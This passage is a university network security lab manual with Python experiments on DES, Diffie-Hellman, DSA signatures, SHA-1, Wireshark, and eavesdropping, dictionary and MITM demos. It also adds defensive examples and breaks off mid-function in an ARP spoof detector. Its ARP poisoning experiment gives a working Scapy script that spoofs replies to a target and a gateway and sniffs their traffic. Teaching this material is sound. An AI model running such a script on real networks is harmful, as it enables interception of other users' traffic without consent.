Ccs354-Network Security-Lab Manual (Updated)

The document provides a list of experiments related to cryptography and network security, including the implementation of symmetric key algorithms, key exchange algorithms, and digital signatures. It details the procedures and Python programs for various experiments, such as using the Data Encryption Standard (DES) for user message encryption and the Diffie-Hellman key exchange algorithm. Additionally, it covers the installation and use of Wireshark and tcpdump for observing data transfer in client-server communication.

Uploaded by

s.shaflafathima
Copyright
© All Rights Reserved

LIST OF EXPERIMENTS

Ex. No.   Date   Name of the Experiment   Pg. No

1.   Implementing symmetric key algorithms – DES
2.   Implementing Key exchange algorithms
3.   Implement the SIGNATURE SCHEME – Digital Signature Standard.
4.   Installation of Wireshark, tcpdump and observe data transferred in client-server communication using UDP/TCP and identify the UDP/TCP datagram.
5.   Check message integrity and confidentiality using SSL
6.   Experiment Eavesdropping, Dictionary attacks, MITM attacks
7.   Experiment with Sniff Traffic using ARP Poisoning
8.   Demonstrate intrusion detection system using any tool.
9.   Explore network monitoring tools
10.  Study to configure Firewall, VPN

EX.NO: 1
DATE:

DATA ENCRYPTION STANDARD (DES) ALGORITHM (USER MESSAGE ENCRYPTION)

AIM:

To use Data Encryption Standard (DES) Algorithm for a practical application like
User Message Encryption.

ALGORITHM:
1. Create a DES Key.
2. Create a Cipher instance from the Cipher class, specifying the following
   information, separated by a slash (/):
   a. Algorithm name
   b. Mode (optional)
   c. Padding scheme (optional)
3. Convert the String into Byte[] array format.
4. Put the Cipher in encrypt mode, and encrypt with the Cipher.doFinal() method.
5. Put the Cipher in decrypt mode, and decrypt with the Cipher.doFinal() method.

PROGRAM:

# Install the dependency first: pip install pycryptodome
from Crypto.Cipher import DES
from Crypto.Random import get_random_bytes

# Generate a random key
key = get_random_bytes(8)  # DES key must be 8 bytes
# ECB mode encrypts identical plaintext blocks to identical ciphertext blocks
cipher = DES.new(key, DES.MODE_ECB)

# Padding function to ensure data is aligned to the block size
# (space padding cannot round-trip a message that itself ends in spaces)
def pad(text):
    while len(text) % 8 != 0:
        text += b' '  # Padding with spaces
    return text

# Encrypt a message
plaintext = b'Secret Information'
padded_plaintext = pad(plaintext)
ciphertext = cipher.encrypt(padded_plaintext)
print(f'Encrypted: {ciphertext}')

# Decrypt the message
cipher_dec = DES.new(key, DES.MODE_ECB)
decrypted_padded = cipher_dec.decrypt(ciphertext)
decrypted = decrypted_padded.rstrip(b' ')  # Removing the padding
print(f'Decrypted: {decrypted.decode()}')

OUTPUT:

Encrypted: b'/p\x04\x07@\xd0\x9a\xf0\x8e\xe5[i\xc9q>F\xdf\x8d)/\xff\xefS\xfa'

Decrypted: Secret Information

RESULT:
Thus the Python program for DES Algorithm has been implemented and the output
verified successfully.

EX.NO: 2
DATE:

DIFFIE-HELLMAN KEY EXCHANGE ALGORITHM

AIM:

To implement the Diffie-Hellman Key Exchange algorithm for a given problem.

ALGORITHM:

Step 1: Alice and Bob publicly agree to use a modulus p = 23 and base g = 5
        (which is a primitive root modulo 23).
Step 2: Alice chooses a secret integer a = 4, then sends Bob A = g^a mod p
        a. A = 5^4 mod 23 = 4
Step 3: Bob chooses a secret integer b = 3, then sends Alice B = g^b mod p
        a. B = 5^3 mod 23 = 10
Step 4: Alice computes s = B^a mod p
        a. s = 10^4 mod 23 = 18
Step 5: Bob computes s = A^b mod p
        a. s = 4^3 mod 23 = 18
Step 6: Alice and Bob now share a secret (the number 18).

PROGRAM:

# Publicly agreed parameters
p = 23  # Prime modulus
g = 5   # Base (primitive root modulo p)

# Alice's secret integer
a = 4
A = pow(g, a, p)  # A = g^a mod p
print(f"Alice's public value A: {A}")

# Bob's secret integer
b = 3
B = pow(g, b, p)  # B = g^b mod p
print(f"Bob's public value B: {B}")

# Alice computes the shared secret
shared_secret_A = pow(B, a, p)  # s = B^a mod p
print(f"Alice's shared secret: {shared_secret_A}")

# Bob computes the shared secret
shared_secret_B = pow(A, b, p)  # s = A^b mod p
print(f"Bob's shared secret: {shared_secret_B}")

# Verify that both shared secrets are the same
assert shared_secret_A == shared_secret_B
print("Diffie-Hellman Key Exchange Successful")

OUTPUT:

Alice's public value A: 4
Bob's public value B: 10
Alice's shared secret: 18
Bob's shared secret: 18
Diffie-Hellman Key Exchange Successful

RESULT:
Thus the Diffie-Hellman key exchange algorithm has been implemented using Python
Program and the output has been verified successfully.
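
The exchange above with the two checks a real endpoint adds, as an added example that is not part of the original lab manual: each side validates the peer's public value before using it and hashes the shared secret into a fixed-length key. It reuses the manual's toy parameters p = 23 and g = 5; the function names and the SHA-256 derivation step are assumptions of this example.

```python
import hashlib
import secrets

P, G = 23, 5  # the manual's toy parameters; deployed groups use primes of 2048 bits or more


def public_for(secret, p=P, g=G):
    """Public value g^secret mod p for a chosen secret."""
    return pow(g, secret, p)


def check_public(y, p=P):
    """Accept only peer values in [2, p-2].

    0, 1 and p-1 force the shared secret to 0, 1 or +/-1 whatever the
    local secret is, so an endpoint must refuse them.
    """
    if not isinstance(y, int) or not 2 <= y <= p - 2:
        raise ValueError(f"public value {y!r} is outside [2, p-2]")
    return y


def keypair(p=P, g=G):
    """Draw a random secret from [2, p-2] whose public value a peer will accept."""
    while True:
        x = 2 + secrets.randbelow(p - 3)
        y = pow(g, x, p)
        if 2 <= y <= p - 2:  # with g = 5, x = 11 gives y = p-1; draw again
            return x, y


def shared_key(own_secret, peer_public, p=P):
    """Return (s, key): the raw shared secret and a 32-byte key derived from it."""
    s = pow(check_public(peer_public, p), own_secret, p)
    width = (p.bit_length() + 7) // 8
    return s, hashlib.sha256(s.to_bytes(width, "big")).digest()


if __name__ == "__main__":
    a, A = keypair()
    b, B = keypair()
    s_alice, k_alice = shared_key(a, B)
    s_bob, k_bob = shared_key(b, A)
    print("public values:", A, B)
    print("keys match:", k_alice == k_bob)
    for bad in (0, 1, P - 1):
        try:
            shared_key(a, bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The range check does not authenticate the peer; that needs a signature or pre-shared key over the exchanged values.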

EX.NO: 3
DATE:

DIGITAL SIGNATURE STANDARD

AIM:

To implement the SIGNATURE SCHEME - Digital Signature Standard.


ALGORITHM:

1. Create a KeyPairGenerator object.
2. Initialize the KeyPairGenerator object.
3. Generate the KeyPairGenerator. ...
4. Get the private key from the pair.
5. Create a signature object.
6. Initialize the Signature object.
7. Add data to the Signature object
8. Calculate the Signature

PROGRAM:

from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import utils

# Generate DSA key pair
private_key = dsa.generate_private_key(key_size=2048)
public_key = private_key.public_key()

# Message to sign
message = b'This is a message for digital signature'

# Sign the message
signature = private_key.sign(message, hashes.SHA256())
print(f'Digital signature for given text: {signature}')

# Verify the signature (verify() raises InvalidSignature if the check fails)
public_key.verify(signature, message, hashes.SHA256())
print("Signature verified successfully.")

OUTPUT:
Digital signature for given text: b'0E\x02
\x1e\xce\x13\xdb\t\x94]AW]\xbcl\xa6\x11\xfd\x8e\xd4jv.\x9c{\xcc,\xd3d\x04\xbfdT\xee\xac\
x02!\x00\x83\xcb\xa7\xbfaW\xbbrU\x9ao\xf3<\xe1\xcd\xda\x1b\x13`\xe3\xcbGg\x01\xbe\xd
dJ\xb5\xfby\x8d\x9b'
Signature verified successfully.
RESULT:
Thus the Digital Signature Standard Signature Scheme has been implemented and the output
has been verified successfully.

EX.NO: 4
DATE:

INSTALLATION OF WIRESHARK, TCPDUMP AND OBSERVE DATA TRANSFERRED IN CLIENT-SERVER
COMMUNICATION USING UDP/TCP AND IDENTIFY THE UDP/TCP DATAGRAM

AIM:
To perform the installation of Wireshark and tcpdump, observe data transferred in
client-server communication using UDP/TCP, and identify the UDP/TCP datagram.

INTRODUCTION:

The first part of the lab introduces the packet sniffer Wireshark. Wireshark is a free,
open source network protocol analyzer. It is used for network troubleshooting and
communication protocol analysis. Wireshark captures network packets in real time
and displays them in human-readable format. It provides many advanced features,
including live capture and offline analysis, a three-pane packet browser, and coloring
rules for analysis. This document uses Wireshark for the experiments, and it covers
Wireshark installation, packet capturing, and protocol analysis.

Figure 1: Wireshark in Kali Linux

Background TCP/IP Network Stack

Figure 2: Encapsulation of Data in the TCP/IP Network Stack

In the CSC 4190 Introduction to Computer Networking (one of the prerequisite courses), the
TCP/IP network stack is introduced and studied. This background section briefly explains the
concept of the TCP/IP network stack to help you better understand the experiments. TCP/IP is
the most commonly used network model for Internet services. Because its most important
protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP), were the
first networking protocols defined in this standard, it is named TCP/IP. However, it contains
multiple layers, including the application layer, transport layer, network layer, and data
link layer.

- Application Layer: The application layer includes the protocols used by most applications
for providing user services. Examples of application layer protocols are Hypertext

Packet Sniffer

A packet sniffer is a basic tool for observing network packet exchanges in a computer. As
the name suggests, a packet sniffer captures (“sniffs”) packets being sent/received
from/by your computer.

The second component of a packet sniffer is the packet analyzer, which displays the
contents of all fields within a protocol message. In order to do so, the packet analyzer

[Figure: Packet Sniffer Structure]

For example, suppose we are interested in displaying the various fields in messages
exchanged by the HTTP protocol in Figure 3. The packet analyzer understands the
format of Ethernet frames, and so can identify the IP datagram within an Ethernet frame.
It also understands the IP datagram format, so that it can extract the TCP segment within
the IP datagram. Finally, it understands the TCP segment structure, so it can extract the
HTTP message contained in the TCP segment. Finally, it understands the HTTP protocol
and so, for example, knows that the first bytes of an HTTP message will contain the
string “GET,” “POST,” or “HEAD”.

We will be using the Wireshark packet sniffer [http://www.wireshark.org/] for these labs,
allowing us to display the contents of messages being sent/received from/by protocols at
different levels of the protocol stack. (Technically speaking, Wireshark is a packet
analyzer that uses a packet capture library in your computer). Wireshark is a free network
protocol analyzer that runs on Windows, Linux/Unix, and Mac computers.

Getting Wireshark
Kali Linux has Wireshark installed. You can just launch the Kali Linux VM and
open Wireshark there. Wireshark can also be downloaded from here:

https://www.wireshark.org/download.html

Starting Wireshark:
When you run the Wireshark program, the Wireshark graphical user interface will be shown
as in Figure 5. Currently, the program is not capturing the packets.

[Figure: Capture Interfaces in Wireshark]

[Figure: Capturing Packets in Wireshark]

[Figure: Wireshark Graphical User Interface on Microsoft Windows]

The Wireshark interface has five major components:

The command menus are standard pulldown menus located at the top of the window. Of
interest to us now are the File and Capture menus. The File menu allows you to save captured
packet data or open a file containing previously captured packet data, and exit the Wireshark
application. The Capture menu allows you to begin packet capture.


The packet-listing window displays a one-line summary for each packet captured,
including the packet number (assigned by Wireshark; this is not a packet number
contained in any protocol’s header), the time at which the packet was captured, the
packet’s source and destination addresses, the protocol type, and protocol-specific
information contained in the packet. The packet listing can be sorted according to any of
these categories by clicking on a column name. The protocol type field lists the highest
level protocol that sent or received this packet, i.e., the protocol that is the source or
ultimate sink for this packet.

The packet-header details window provides details about the packet selected
(highlighted) in the packet-listing window. (To select a packet in the packet-listing
window, place the cursor over the packet’s one-line summary in the packet-listing
window and click with the left mouse button.) The packet-contents window displays
the entire contents of the captured frame, in both ASCII and hexadecimal format.

Towards the top of the Wireshark graphical user interface is the packet display filter
field, into which a protocol name or other information can be entered in order to filter
the information displayed in the packet-listing window (and hence the packet-header
and packet-contents windows). In the example below, we’ll use the packet-display filter
field to have Wireshark hide (not display) packets except those that correspond to
HTTP messages.

Capturing Packets
After downloading and installing Wireshark, you can launch it and click the name of an
interface under Interface List to start capturing packets on that interface. For example,
if you want to capture traffic on the wireless network, click your wireless interface.

Test Run
Do the following steps:

1. Start up the Wireshark program (select an interface and press start
   to capture packets).
2. Start up your favorite browser (Iceweasel in Kali Linux).
3. In your browser, go to the Wayne State homepage by typing www.wayne.edu.
4. After your browser has displayed the http://www.wayne.edu page, stop
   Wireshark packet capture by selecting stop in the Wireshark capture window.
   This will cause the Wireshark capture window to disappear and the main
   Wireshark window to display all packets captured since you began packet
   capture; see image below:
5. Color Coding: You’ll probably see packets highlighted in green, blue, and
black. Wireshark uses colors to help you identify the types of traffic at a
glance. By default, green is TCP traffic, dark blue is DNS traffic, light blue is UDP
traffic, and black identifies TCP packets with problems — for example, they could
have been delivered out-of-order.
6. You now have live packet data that contains all protocol messages exchanged
   between your computer and other network entities!
7. However, as you will notice, the HTTP messages are not clearly shown because
   there are many other packets included in the packet capture. Even though the
   only action you took was to open your browser, there are many other programs
   in your computer that communicate via the network in the background. To filter
   the connections to the ones we want to focus on, we have to use the filtering
   functionality of Wireshark by typing “http” in the filtering field as shown below:
8. Notice that we now view only the packets that are of protocol HTTP.
   However, we also still do not have the exact communication we want to focus
   on because using HTTP as a filter is not descriptive enough to allow us to find
   our connection to http://www.wayne.edu. We need to be more precise if we
   want to capture the correct set of packets.
9. To further filter packets in Wireshark, we need to use a more precise filter. By
   setting the filter to http.host == www.wayne.edu, we are restricting the view to
   packets that have the www.wayne.edu website as their HTTP host. Notice that we
   need two equal signs to perform the match, not just one. See the screenshot below:
10. Now, we can try another protocol. Let’s use the Domain Name
    System (DNS) protocol as an example here.

Let’s now try to find out what those packets contain by following conversations (also
called network flows). Select one of the packets and press the right mouse button (if you are
on a Mac, use the command button and click); you should see something similar to the screen
below:

Click on Follow UDP Stream, and then you will see the following screen.

1. If we close this window and change the filter back to “http.host == www.wayne.edu”
and then follow a packet from the list of packets that match that filter, we should get
something similar to the following screens. Note that we click on Follow TCP
Stream this time.

RESULT:

Thus, the installation of Wireshark and tcpdump is performed, the data transferred in
client-server communication using UDP/TCP is observed, and the UDP/TCP datagram
is identified.

EX.NO: 5
DATE:

CHECK MESSAGE INTEGRITY AND CONFIDENTIALITY USING SSL

AIM:

To calculate the message digest of a text using the SHA-1 algorithm.

ALGORITHM:

1. Append Padding Bits
2. Append Length - 64 bits are appended to the end
3. Prepare Processing Functions
4. Prepare Processing Constants
5. Initialize Buffers
6. Processing Message in 512-bit blocks (L blocks in total message)

PROGRAM:

import hashlib

def sha1_hash(input_data):
    sha1 = hashlib.sha1()
    sha1.update(input_data.encode())
    return sha1.hexdigest()

# Test inputs
inputs = ["", "abc", "abcdefghijklmnopqrstuvwxyz"]

# Print SHA-1 hashes
for input_data in inputs:
    print(f'SHA1("{input_data}") = {sha1_hash(input_data)}')

OUTPUT:
SHA1("") = da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA1("abc") = a9993e364706816aba3e25717850c26c9cd0d89d
SHA1("abcdefghijklmnopqrstuvwxyz") = 32d10c7b8cf96570ca04ce37f2a19d84240d3a89
RESULT:
Thus the Secure Hash Algorithm (SHA-1) has been implemented and the output has been
verified successfully.
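
The six steps of the ALGORITHM section written out by hand, as an added example that is not part of the original lab manual: the program above delegates everything to hashlib, while this version performs the padding, length append, round functions, constants, buffer initialisation and 512-bit block processing itself and checks the result against hashlib. The function names are this example's own.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF


def rotl(x, n):
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK


def sha1(message: bytes) -> str:
    # Step 1: append the bit 1 (byte 0x80), then zeros until length is 56 mod 64
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded)) % 64)
    # Step 2: append the original length in bits as a 64-bit big-endian integer
    padded += struct.pack(">Q", len(message) * 8)

    # Step 5: initialise the five 32-bit buffers
    h0, h1, h2, h3, h4 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0

    # Step 6: process the message in 512-bit (64-byte) blocks
    for off in range(0, len(padded), 64):
        w = list(struct.unpack(">16I", padded[off:off + 64]))
        for t in range(16, 80):                      # message schedule
            w.append(rotl(w[t - 3] ^ w[t - 8] ^ w[t - 14] ^ w[t - 16], 1))

        a, b, c, d, e = h0, h1, h2, h3, h4
        for t in range(80):
            # Steps 3 and 4: the round function f and constant k change every 20 rounds
            if t < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif t < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif t < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            temp = (rotl(a, 5) + f + e + k + w[t]) & MASK
            a, b, c, d, e = temp, a, rotl(b, 30), c, d

        h0 = (h0 + a) & MASK
        h1 = (h1 + b) & MASK
        h2 = (h2 + c) & MASK
        h3 = (h3 + d) & MASK
        h4 = (h4 + e) & MASK

    return "%08x%08x%08x%08x%08x" % (h0, h1, h2, h3, h4)


if __name__ == "__main__":
    for text in ("", "abc", "abcdefghijklmnopqrstuvwxyz"):
        digest = sha1(text.encode())
        print(f'SHA1("{text}") = {digest}', digest == hashlib.sha1(text.encode()).hexdigest())
```

Practical collisions for SHA-1 have been published, so new integrity checks should use SHA-256 or SHA-3; the padding and block structure shown here is the same idea in SHA-256.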

EX.NO: 6
DATE:

EXPERIMENT EAVESDROPPING, DICTIONARY ATTACKS, MITM ATTACKS

AIM:
To experiment with eavesdropping, dictionary attacks, and MITM attacks.

ALGORITHM:

Eavesdropping:
Step 1: Set Up the Server
• Create a socket for the server.
• Bind the server socket to a specific address and port (localhost, 8080).
• Listen for incoming connections and accept a connection.
• Receive data from the client, print the received message, and send the data back to the
  client.
• Close the connection.
Step 2: Set Up the Client
• Create a socket for the client.
• Connect the client socket to the server's address and port (localhost, 8080).
• Send a message from the client to the server.
• Print the sent message.
• Receive the echoed message from the server and print it.
• Close the connection.
Step 3: Execute Server and Client in Separate Threads
• Create and start a thread for the server function.
• Create and start a thread for the client function.
• Wait for both threads to complete execution.

Dictionary attack:
Step 1: Import the Required Library
• Import the hashlib library for hashing.
Step 2: Define the Dictionary of Potential Passwords
• Create a list called dictionary containing potential passwords.
Step 3: Define the Hashed Password to be Cracked
• Hash the known password ("password1") using SHA-256 and store the hashed value
  in hashed_password.
Step 4: Perform the Dictionary Attack
• Loop through each word in the dictionary:
  o Hash the current word using SHA-256.
  o Compare the hashed value of the current word with the hashed value of the
    known password (hashed_password).
  o If they match, print the word and break out of the loop.

Man-in-the-Middle (MITM) Attack:
Step 1: Set Up the MITM Server
• Create a socket for the MITM server.
• Bind the server socket to localhost on port 8080.
• Listen for incoming connections.
• Accept a connection and receive data from the client.
• Modify the received data and print it.
• Send the modified data back to the client.
• Close the connection.
Step 2: Set Up the Client
• Create a socket for the client.
• Connect the client socket to the MITM server's address and port (localhost, 8080).
• Send a message from the client to the server.
• Print the sent message.
• Receive the modified message from the server and print it.
• Close the connection.
Step 3: Execute MITM Server and Client in Separate Threads
• Create and start a thread for the MITM server function.
• Create and start a thread for the client function.


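PROGRAM:
Eavesdropping:

import socket, threading

ready = threading.Event()  # Set once the server is listening

# Server function
def server():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('localhost', 8080))
    s.listen(1)
    ready.set()
    conn, _ = s.accept()
    data = conn.recv(1024).decode()
    print(f"Server received: {data}")
    conn.send(data.encode())
    conn.close()
    s.close()

# Client function
def client():
    ready.wait()  # Do not connect before the server is listening
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.connect(('localhost', 8080))
    msg = "Hello, Server!"
    c.send(msg.encode())
    print(f"Client sent: {msg}")
    print(f"Client received: {c.recv(1024).decode()}")
    c.close()

# Start server and client, then wait for both threads to finish
server_thread = threading.Thread(target=server)
client_thread = threading.Thread(target=client)
server_thread.start()
client_thread.start()
server_thread.join()
client_thread.join()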

OUTPUT:
Client sent: Hello, Server!
Server received: Hello, Server!
Client received: Hello, Server!

Dictionary attack:

import hashlib

# Dictionary of potential passwords
dictionary = ["password", "123456", "admin", "letmein", "password1"]

# Hashed password to be cracked
hashed_password = hashlib.sha256("password1".encode()).hexdigest()

# Perform dictionary attack
for word in dictionary:
    if hashlib.sha256(word.encode()).hexdigest() == hashed_password:
        print(f"Password found: {word}")
        break


OUTPUT:
Password found: password1
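
The storage-side counterpart to the dictionary attack above, as an added example that is not part of the original lab manual: the attack succeeds in one hash per guess because the stored value is an unsalted, fast SHA-256 digest, so this sketch stores a per-user random salt with a PBKDF2-HMAC-SHA256 digest instead. The record format, function names and iteration count are assumptions of this example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumption: work factor picked for this example; tune to your hardware


def unsalted_sha256(password):
    """The storage format used by the program above (shown for contrast)."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: scheme$iterations$salt$digest."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, record):
    """Recompute the digest with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, dk_hex = record.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError(f"unsupported scheme {scheme!r}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def table_hits(records, dictionary):
    """Count stored records that a precomputed table of plain SHA-256 digests matches."""
    table = {hashlib.sha256(word.encode()).hexdigest() for word in dictionary}
    return sum(1 for record in records if record.split("$")[-1] in table)


if __name__ == "__main__":
    dictionary = ["password", "123456", "admin", "letmein", "password1"]
    weak = [unsalted_sha256("password1"), unsalted_sha256("password1")]
    strong = [hash_password("password1"), hash_password("password1")]
    print("identical unsalted records:", weak[0] == weak[1])     # same password, same digest
    print("identical salted records:  ", strong[0] == strong[1])  # salts differ
    print("table hits, unsalted:", table_hits(weak, dictionary))
    print("table hits, salted:  ", table_hits(strong, dictionary))
    print("login still works:", verify_password("password1", strong[0]))
```

A weak password remains guessable one candidate at a time; the salt removes precomputation and cross-user reuse, and the iteration count multiplies the cost of every guess.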

Man-in-the-Middle (MITM) Attack:

import socket, threading

ready = threading.Event()  # Set once the MITM server is listening

# MITM server function
def mitm_server():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('localhost', 8080))
    s.listen(1)
    ready.set()
    conn, _ = s.accept()
    data = conn.recv(1024).decode()
    modified_data = data.replace("Hello", "Intercepted")
    print(f"MITM modified: {modified_data}")
    conn.send(modified_data.encode())
    conn.close()
    s.close()

# MITM client function
def mitm_client():
    ready.wait()  # Do not connect before the server is listening
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.connect(('localhost', 8080))
    msg = "Hello, Server!"
    c.send(msg.encode())
    print(f"Client sent: {msg}")
    print(f"Client received: {c.recv(1024).decode()}")
    c.close()

# Start the MITM server and client
threading.Thread(target=mitm_server).start()
threading.Thread(target=mitm_client).start()

OUTPUT:
Client sent: Hello, Server!
MITM modified: Intercepted, Server!
Client received: Intercepted, Server!
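
How a receiver detects the modification shown in the MITM program, as an added example that is not part of the original lab manual: each message carries a sequence number and an HMAC-SHA256 tag, and an unkeyed SHA-256 checksum is shown beside it for contrast. The frame layout and function names are this example's own, and the key is assumed to be shared out of band (in SSL/TLS it comes from the handshake).

```python
import hashlib
import hmac
import secrets
import struct

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def seal(key, seq, message):
    """Frame = 8-byte sequence number || message || HMAC-SHA256 tag over both."""
    body = struct.pack(">Q", seq) + message
    return body + hmac.new(key, body, hashlib.sha256).digest()


def open_frame(key, expected_seq, frame):
    """Return the message, or raise ValueError if the frame was altered or replayed."""
    if len(frame) < 8 + TAG_LEN:
        raise ValueError("frame too short")
    body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        raise ValueError("integrity check failed")
    (seq,) = struct.unpack(">Q", body[:8])
    if seq != expected_seq:
        raise ValueError("unexpected sequence number")
    return body[8:]


def plain_seal(message):
    """Contrast case: message || SHA-256(message), with no key involved."""
    return message + hashlib.sha256(message).digest()


def plain_open(frame):
    message, digest = frame[:-TAG_LEN], frame[-TAG_LEN:]
    if not hmac.compare_digest(digest, hashlib.sha256(message).digest()):
        raise ValueError("digest mismatch")
    return message


def modify_in_transit(frame, recompute_digest=False):
    """The MITM program's edit (Hello -> Intercepted) applied to a frame in transit."""
    if recompute_digest:
        # Anyone on the path can do this: SHA-256 alone needs no secret.
        return plain_seal(frame[:-TAG_LEN].replace(b"Hello", b"Intercepted"))
    return frame.replace(b"Hello", b"Intercepted")


def demo():
    key = secrets.token_bytes(32)
    msg = b"Hello, Server!"
    results = {"clean": open_frame(key, 1, seal(key, 1, msg))}
    try:
        open_frame(key, 1, modify_in_transit(seal(key, 1, msg)))
        results["hmac_modified"] = "accepted"
    except ValueError as exc:
        results["hmac_modified"] = f"rejected: {exc}"
    results["plain_modified"] = plain_open(modify_in_transit(plain_seal(msg), True))
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```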

RESULT :
Thus the programs for Eavesdropping, Dictionary attacks, MITM attacks were implemented
successfully.

EX.NO: 7
DATE:

PERFORM AN EXPERIMENT TO SNIFF TRAFFIC USING ARP POISONING

AIM:

Perform an Experiment to Sniff Traffic using ARP Poisoning.


DESCRIPTION:
ARP is the acronym for Address Resolution Protocol. It is used to convert IP addresses to
physical addresses [MAC addresses] on a switch. The host sends an ARP broadcast on the
network, and the recipient computer responds with its physical address [MAC address]. The
resolved IP/MAC address is then used to communicate. ARP poisoning is sending fake MAC
addresses to the switch so that it can associate the fake MAC addresses with the IP address of
a genuine computer on a network and hijack the traffic.
Scapy is a powerful Python library used for network packet manipulation, including creating,
sending, and sniffing network packets. Here’s a complete example using Scapy to perform
ARP poisoning and sniff traffic.

ALGORITHM:
Step 1: Install scapy
• Ensure the scapy library is installed on your system.

Step 2: Import Necessary Libraries
• Import ARP, send, sniff from scapy.all.
• Import signal and sys.

Step 3: Define Function poison to Perform ARP Poisoning
• Create the poison function to send spoofed ARP responses to both the target and
  gateway.

Step 4: Define Function restore to Restore ARP Tables
• Create the restore function to send correct ARP responses and restore the ARP tables
  to their original state.

Step 5: Define Function sniff_packets to Sniff Packets
• Create the sniff_packets function to print the summary of each captured packet.

Step 6: Define signal_handler to Restore Network on Script Interruption
• Create the signal_handler function to restore the ARP tables and exit the script
  gracefully when interrupted.

Step 7: Register the Signal Handler
• Use signal.signal to register the signal_handler function to handle the interrupt signal
  (SIGINT).

Step 8: Initialize Example IPs and MAC Addresses
• Define example IPs and MAC addresses for the target and gateway (replace with
  actual values from your network).

Step 9: Start ARP Poisoning and Sniff Packets
• In a try block, start ARP poisoning using the poison function and sniff packets using
  the sniff_packets function in a loop.
• Ensure the signal_handler restores the network when the script is interrupted.

PROGRAM:

# Install the dependency first: pip install scapy
from scapy.all import ARP, send, sniff
import signal
import sys

# Function to perform ARP poisoning
def poison(target_ip, gateway_ip, target_mac, gateway_mac):
    send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac), verbose=False)
    send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac), verbose=False)

# Function to restore ARP tables
def restore(target_ip, gateway_ip, target_mac, gateway_mac):
    send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwsrc=gateway_mac,
             hwdst=target_mac), count=3, verbose=False)
    send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwsrc=target_mac,
             hwdst=gateway_mac), count=3, verbose=False)

# Function to sniff packets
def sniff_packets(packet):
    print(f"Packet: {packet.summary()}")

# Signal handler to restore network on script interruption
def signal_handler(sig, frame):
    print("Stopping ARP poisoning. Restoring network...")
    restore(target_ip, gateway_ip, target_mac, gateway_mac)
    print("Network restored.")
    sys.exit(0)

# Example IPs and MAC addresses (use real values from your network)
target_ip = "192.168.1.2"
gateway_ip = "192.168.1.1"
target_mac = "00:00:00:00:00:02"   # Replace with actual MAC address
gateway_mac = "00:00:00:00:00:01"  # Replace with actual MAC address

# Register the signal handler
signal.signal(signal.SIGINT, signal_handler)

try:
    print("Starting ARP poisoning... Press Ctrl+C to stop.")
    while True:
        poison(target_ip, gateway_ip, target_mac, gateway_mac)
        sniff(filter="ip", prn=sniff_packets, count=10)  # Sniff packets
except KeyboardInterrupt:
    pass  # This block is now handled by signal_handler

OUTPUT:

WARNING: You should be providing the Ethernet destination MAC address when sending an is-at ARP.
Starting ARP poisoning... Press Ctrl+C to stop.
WARNING: MAC address to reach destination not found. Using broadcast.
WARNING: You should be providing the Ethernet destination MAC address when sending an is-at ARP.
Packet: Ether / IP / TCP 192.168.1.36:55471 > 192.168.1.25:8009 PA / Raw
Packet: Ether / IP / TCP 192.168.1.36:55472 > 192.168.1.25:8009 PA / Raw
……. ……. …….
After stopping the script:
Stopping ARP poisoning. Restoring network...
RESULT:
Thus the experiment to Sniff Traffic using ARP Poisoning was performed.
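
The detection side of this experiment, as an added example that is not part of the original lab manual: a watcher parses raw 28-byte ARP payloads, remembers the first MAC seen for each IP, and raises an alert when a later packet rebinds an IP or when one MAC answers for several IPs. The sample packets are constructed in the script from the manual's example addresses plus a made-up third station (192.168.1.66), and every name in the code is this example's own.

```python
import socket
import struct

ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, op, sender MAC/IP, target MAC/IP


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed sample: an ARP is-at (op=2) payload for Ethernet/IPv4."""
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, 2,
                       mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                       mac_bytes(target_mac), socket.inet_aton(target_ip))


def parse_arp(payload):
    """Return (op, sender_mac, sender_ip) from an ARP payload."""
    if len(payload) < 28:
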